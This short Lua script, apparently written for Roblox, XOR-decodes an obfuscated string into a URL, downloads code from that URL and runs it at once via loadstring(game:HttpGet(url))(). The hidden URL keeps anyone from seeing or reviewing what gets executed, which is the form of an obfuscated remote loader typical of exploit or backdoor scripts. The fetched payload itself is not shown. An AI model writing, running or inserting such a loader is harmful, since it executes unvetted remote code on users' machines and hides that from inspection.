local function d(s,k)
    local r=""
    for i=1,#s do
        local c=string.byte(s,i)
        r=r..string.char(c ~ (k % 256))
        k=(k * 31 + 17) % 4294967296
    end
    return r
end


local enc = "\242\193\221\241\205\198\221\204\202\212\216\252\221\237\248\233\207\224\203\231\231\211\225\245\196\229\249\244\229\211\195\230\236\204\237\242\199\194\244\200\206\243\206\251\212\242\198\245\246\241\198\247\203\246\213\251\212\241\210"
local key = 20240714  

local url = d(enc, key)
loadstring(game:HttpGet(url))()
